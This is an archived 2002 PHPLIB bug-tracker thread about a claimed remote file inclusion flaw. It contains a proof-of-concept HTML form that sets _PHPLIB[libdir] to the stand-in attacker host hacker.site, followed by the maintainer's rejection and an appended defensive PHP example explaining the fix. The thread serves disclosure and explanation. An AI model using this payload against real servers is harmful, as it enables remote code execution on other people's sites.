[Phplib-trackers] [ phplib-Bugs-524783 ] Security HOLE
Brought to you by: nhruby, richardarcher
From: <no...@so...> - 2002-03-20 05:25:47
Bugs item #524783, was opened at 2002-03-03 01:02
You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=403611&aid=524783&group_id=31885

Category: None
Group: None
>Status: Closed
>Resolution: Rejected
Priority: 5
Submitted By: Nobody/Anonymous (nobody)
Assigned to: Richard Archer (richardarcher)
Summary: Security HOLE

Initial Comment:

!!! Remote code execution !!!

file:
    /pages/new_user_alt.php3
    /pages/view_sessions.php3
    /pages/showoff.php3

line:
    include($_PHPLIB["libdir"] . "table.inc");

example:
    <form method=POST action="http://phplib.sourceforge.net/showroom/view_sessions.php3">
    <input type=hidden name="_PHPLIB[libdir]" value="http://hacker.site/some_path/">
    <input type=submit>
    </form>

versions tested: <7.4-pr1 tested (and works) on http://phplib.sourceforge.net/

----------------------------------------------------------------------

Comment By: Richard Archer (richardarcher)
Date: 2002-03-03 12:12

Message:
Logged In: YES
user_id=279311

This is not a security flaw in PHPLIB. There was once a problem with _PHPLIB handling, but that was fixed back in July 2001 with the release of 7.2d.

The "test cases" described are due to a broken installation of PHPLIB, not a flaw in the library.

To avoid the possibility of remote code being executed on PHPLIB pages, prepend.php3 must be included at the start of any file which uses PHPLIB. It contains the lines:

    $_PHPLIB = array();
    # Can't control your include path?
    # Point this to your PHPLIB base directory. Use a trailing "/"!
    $_PHPLIB["libdir"] = "";

This initialises the include path variable so that it cannot be overridden by crafted form input.

Unless more convincing evidence of a problem is forthcoming, this bug report will be closed with no action taken.

----------------------------------------------------------------------
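The mechanism behind the report and the reply, as an added example (not PHPLIB's code and not posted by either participant): with register_globals=On (the default before PHP 4.2), a POST field named _PHPLIB[libdir] became the global array $_PHPLIB, so any page that used $_PHPLIB["libdir"] without first assigning it built its include path from attacker input. Assigning $_PHPLIB before use, as prepend.php3 does, discards whatever the request injected. The function names, the simulated request array, the libdir /usr/local/lib/phplib/ and the extra scheme/traversal check are this example's own assumptions.

```php
<?php
// Added example, not PHPLIB's own code. Models what register_globals did
// with the POSTed field _PHPLIB[libdir] and why initialising $_PHPLIB first
// (the prepend.php3 pattern) closes the hole. Names and inputs are assumed.

// Constructed request: register_globals would have turned the form field
// _PHPLIB[libdir]=http://hacker.site/some_path/ into exactly this global.
$simulatedRegisterGlobals = [
    '_PHPLIB' => ['libdir' => 'http://hacker.site/some_path/'],
];

// Vulnerable pattern (mirrors the reported pages, which reached
// include($_PHPLIB["libdir"] . "table.inc") without prepend.php3):
// $_PHPLIB is whatever the request supplied.
function vulnerableIncludePath(array $globals): string
{
    $_PHPLIB = $globals['_PHPLIB'] ?? [];     // attacker-controlled under register_globals
    return ($_PHPLIB['libdir'] ?? '') . 'table.inc';
}

// Hardened pattern (prepend.php3): $_PHPLIB is assigned by the installer
// before any use, so the injected global is simply overwritten.
function hardenedIncludePath(array $globals, string $configuredLibdir): string
{
    $_PHPLIB = [];                            // as in prepend.php3: $_PHPLIB = array();
    $_PHPLIB['libdir'] = $configuredLibdir;   // installer-controlled, trailing "/"
    // $globals is deliberately never consulted: that is the whole fix.

    // Defence in depth, added here and not part of PHPLIB: refuse a libdir
    // that names a URL wrapper or contains traversal, so a later
    // misconfiguration cannot reintroduce remote or out-of-tree includes.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $_PHPLIB['libdir'])
        || strpos($_PHPLIB['libdir'], '..') !== false) {
        throw new RuntimeException('refusing non-local PHPLIB libdir: ' . $_PHPLIB['libdir']);
    }
    return $_PHPLIB['libdir'] . 'table.inc';
}

// Demonstration on the constructed request.
echo "vulnerable: ", vulnerableIncludePath($simulatedRegisterGlobals), "\n";
echo "hardened:   ", hardenedIncludePath($simulatedRegisterGlobals, '/usr/local/lib/phplib/'), "\n";
try {
    hardenedIncludePath($simulatedRegisterGlobals, 'http://hacker.site/some_path/');
} catch (RuntimeException $e) {
    echo "rejected:   ", $e->getMessage(), "\n";
}
```

The first line printed is the remote path the reporter's form produced; the second is the fixed local path that results once $_PHPLIB is initialised before use. Two caveats for anyone reproducing this today: register_globals was removed in PHP 5.4, and since PHP 5.2 include() of an http:// path additionally requires allow_url_include=On, so a modern installation is not exposed in this way even with the prepend omitted. The underlying rule still applies: any variable used to build an include path must be assigned by the application before it is read.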